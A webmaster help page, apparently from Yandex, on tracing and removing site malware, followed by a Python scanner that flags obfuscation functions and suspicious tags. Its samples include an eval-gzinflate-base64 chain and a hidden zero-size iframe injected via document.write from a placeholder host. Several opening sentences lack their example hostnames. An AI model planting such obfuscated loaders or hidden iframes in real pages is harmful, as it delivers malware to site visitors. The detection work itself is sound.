Infection chains

Yandex can provide information about host chains that infect users' computers to help webmasters locate and remove malware from their sites.

This information can be used to determine which page element on the infected site runs the malware.

For example, if the chain appears as follows:

you must take the following actions to stop malware distribution from the site:

  • delete the part of the webpage or script that adds the infected-2.htm elements (<script> or <iframe>) to the page, which load a page block from or redirect to this site;

  • request the owners of to stop the site from using page elements that in turn download elements from;

  • terminate the distribution of malware from

The web server malware that writes the tag to the page, which in turn downloads the element from or redirects to, may be disguised in the following ways:

  • intentionally made incomprehensible or unreadable: we recommend looking for sections of script that you did not write, especially those lacking structure or indentation;

  • encoded: gibberish characters and calls to the eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13, assert, create_function and preg_replace functions often indicate encoded script;

  • hidden in .htaccess directives and in other configuration files of the web server, script interpreter, templates or CMS;

  • dynamically loaded from a third-party web server (using PHP functions such as file_get_contents or curl_exec).

Once deleted, web server malware may reappear for the following reasons:

  • the presence of a web server backdoor;

  • stolen or compromised passwords for the web server (FTP, SSH), the hosting admin panel and the CMS;

  • the server itself may have been compromised, with the root password changed or new users with the necessary privileges added;

  • the webmaster's computer may contain a backdoor or bot that may be used remotely to issue server commands or edit webpages in the webmaster's name.

Web browser malware may be disguised (obfuscated) in a similar fashion. It may use the eval, document.write, document.location, document.URL, window.location and window.navigate constructions; override DOM elements; load items using the <object> and <embed> tags or ActiveX; and change the page code and DOM using scripts and other page elements. In addition, look out for excessively long scripts and superfluous string operations, for example reassigning strings or combining several scripts into one.
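The following added example, written for this page rather than taken from Yandex documentation, turns the two disguise lists above (the server-side PHP indicators and the browser-side constructions) into a simple triage scanner: it flags the named functions and tags, long base64-like blobs, nested decode-into-eval chains, and very long unbroken lines. The four sample fragments are constructed for the demonstration and are not real malware; EXAMPLE-HOST is a placeholder hostname.

```python
import re
from typing import Dict, List

# Functions the page lists as frequent signs of encoded server-side (PHP) script,
# plus the two it names for loading code from a third-party server at run time.
PHP_SUSPECTS = ["eval", "base64_decode", "gzuncompress", "gzinflate", "ob_start",
                "str_rot13", "assert", "create_function", "preg_replace",
                "file_get_contents", "curl_exec"]
# Browser-side constructs the page names for obfuscated client malware, plus the
# <iframe> tag it mentions as the element that pulls in the next host of the chain.
JS_SUSPECTS = ["eval", "document.write", "document.location", "document.URL",
               "window.location", "window.navigate", "<object", "<embed", "<iframe"]
# A run of 40+ base64-alphabet characters: the "gibberish" of an encoded payload.
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# A decoder feeding straight into eval/assert or another decoder, e.g. eval(gzinflate(base64_decode(
NESTED_RE = re.compile(r"\b(eval|assert|gzinflate|gzuncompress|base64_decode|str_rot13)"
                       r"\s*\(\s*(gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(")

def _present(code: str, name: str) -> bool:
    """Tags and DOM properties are matched literally; functions must actually be called."""
    if name.startswith("<") or "." in name:
        return name in code
    return re.search(r"\b" + re.escape(name) + r"\s*\(", code) is not None

def scan_snippet(code: str, kind: str) -> Dict[str, object]:
    """Score one script fragment; kind is 'php' (server side) or 'js' (browser side)."""
    names = PHP_SUSPECTS if kind == "php" else JS_SUSPECTS
    hits: List[str] = [n for n in names if _present(code, n)]
    # Obfuscated code is often a single very long line with almost no whitespace.
    unbroken = any(len(ln) > 200 and ln.count(" ") < len(ln) // 50 for ln in code.splitlines())
    blob = BLOB_RE.search(code) is not None
    nested = NESTED_RE.search(code) is not None
    score = len(hits) + int(unbroken) + int(blob) + 2 * int(nested)
    return {"hits": hits, "unbroken_line": unbroken, "encoded_blob": blob,
            "nested_decode": nested, "score": score, "suspicious": score >= 2}

# Constructed samples (not real malware): a benign and a suspicious fragment of each kind.
PHP_CLEAN = '<?php\n$title = htmlspecialchars($_GET["t"]);\necho "<h1>$title</h1>";\n'
PHP_BAD = ('<?php eval(gzinflate(base64_decode('
           '"QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5")));')  # blob is base64 of A-Z0-9
JS_CLEAN = 'document.getElementById("menu").addEventListener("click", toggle);'
JS_BAD = ('var u="aHR0cDovL0VYQU1QTEUtSE9TVC9pbmZlY3RlZC0yLmh0bQ==";'  # base64 of a placeholder URL
          'document.write(\'<iframe src="\'+atob(u)+\'" width=0 height=0></iframe>\');')

if __name__ == "__main__":
    for label, code, kind in [("php clean", PHP_CLEAN, "php"), ("php bad", PHP_BAD, "php"),
                              ("js clean", JS_CLEAN, "js"), ("js bad", JS_BAD, "js")]:
        print(label, scan_snippet(code, kind))
```

The score is a triage aid for deciding which files to read first, not a verdict: legitimate code uses preg_replace or document.write too, so review every flagged fragment by hand.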